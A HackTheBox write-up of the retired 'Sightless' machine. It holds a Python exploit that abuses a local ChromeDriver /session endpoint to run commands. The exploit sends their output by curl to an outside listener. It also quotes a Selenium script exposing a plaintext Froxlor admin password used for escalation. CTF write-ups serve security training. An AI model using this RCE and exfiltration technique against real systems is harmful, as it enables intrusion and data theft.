Hey folks,

I’ve been working on getting my OSCP and that means drilling HackTheBox. A few months ago, I found myself rabbit-holeing an easy box and it paid off. Now that the box is retired, I want to share the trick I used.

Sightless is a Box sporting SQLPad and Froxlor. Cracking SQLPad was easy enough and got me shell access as the user michael.

According to the official writeup here, once you’re on the box as michael, you’re supposed to netstat for local ports and find 8080 for privesc. I was going about privesc recon and I saw that I needed to target the “john” account. ps -aux | grep john yielded quite a few interesting processes, and I didn’t even need netstat to see that some dynamic ports were open (see --port=34395 below)

Doing some digging, I found a blogpost from 2021 referencing a quirk (and I say quirk rather than vulnerability because the devs have marked this “won’t fix”) in chromium which you can use to get arbitrary code execution if and only if you’re already on a box.

As such, I was able to write this goofy little codeblock after setting up a listener on 8001

import requests
import json
import sys
 
def main(port, command):
    url = f"http://localhost:{port}/session"
    headers = {'Content-Type': 'text/plain'}
    
    # Body mimicking Chrome WebDriver configuration with dynamic command injection
    body = {
        "capabilities": {
            "alwaysMatch": {
                "goog:chromeOptions": {
                    "binary": "/usr/bin/python3",
                    "args": [f"-cimport os;os.system('curl 10.10.14.21:8001?cmd=$({command} | base64)')"]
                }
            }
        }
    }
 
    try:
        # Make the POST request
        response = requests.post(url, headers=headers, data=json.dumps(body))
        
        # Output the response status and content
        print(f"Response status code: {response.status_code}")
        print(f"Response content: {response.content}")
    
    except Exception as e:
        print(f"An error occurred: {e}")
 
if __name__ == "__main__":
    # Expect port and command to be passed as command-line arguments
    if len(sys.argv) != 3:
        print("Usage: python script.py <port> <command>")
    else:
        port = sys.argv[1]
        command = sys.argv[2]
        main(port, command)
 

while the shell this got me wasn’t very privileged, it did yield me the Froxlor selenium script

#!/usr/bin/python3
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.chrome.service import Service
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.common.exceptions import UnexpectedAlertPresentException
from selenium.common.exceptions import NoAlertPresentException
from selenium.webdriver.common.alert import Alert
from selenium.webdriver.support import expected_conditions as EC
import time
import threading
import schedule
 
options = Options()
options.add_argument('--headless')
options.add_argument('--no-sandbox')
options.add_argument('--disable-dev-shm-usage')
 
# Update this line with the path to your locally downloaded Chrome driver
chrome_driver_path = '/home/john/automation/chromedriver'
 
# Use Service to specify the Chrome driver binary path
service = Service(chrome_driver_path)
service.start()
 
driver = webdriver.Chrome(service=service, options=options)
 
def dismiss_all_alerts(driver):
    while True:
        try:
            alert = driver.switch_to.alert
            print(f"Dismissed alert with text: {alert.text}")
            alert.accept()
            time.sleep(1)
        except NoAlertPresentException:
            break
 
print("browser opened")
while True:
    try:
        driver.get("http://admin.sightless.htb:8080/admin_logger.php?page=log")
        time.sleep(7)
 
        # Username Field
        input_element = driver.find_element(By.ID, "loginname")
        input_element.send_keys("admin")
 
        # Password field
        input_element = driver.find_element(By.ID, "password")
        input_element.send_keys("ForlorfroxAdmin" + Keys.ENTER)
        print("Logged In...")
    except UnexpectedAlertPresentException:
        input_element.send_keys(Keys.ENTER)
        pass
    time.sleep(5)
    dismiss_all_alerts(driver)
    driver.get("http://admin.sightless.htb:8080/admin_index.php?action=logout")
    driver.get("http://admin.sightless.htb:8080/")
    print("Logged Out")
    time.sleep(3)
    #driver.close()

which, if you were paying attention, includes the line input_element.send_keys("ForlorfroxAdmin" + Keys.ENTER). I was able to use this password to escalate.

If you’re a CTF admin, make sure you’re hiding root processes from users and otherwise, happy hacking ;)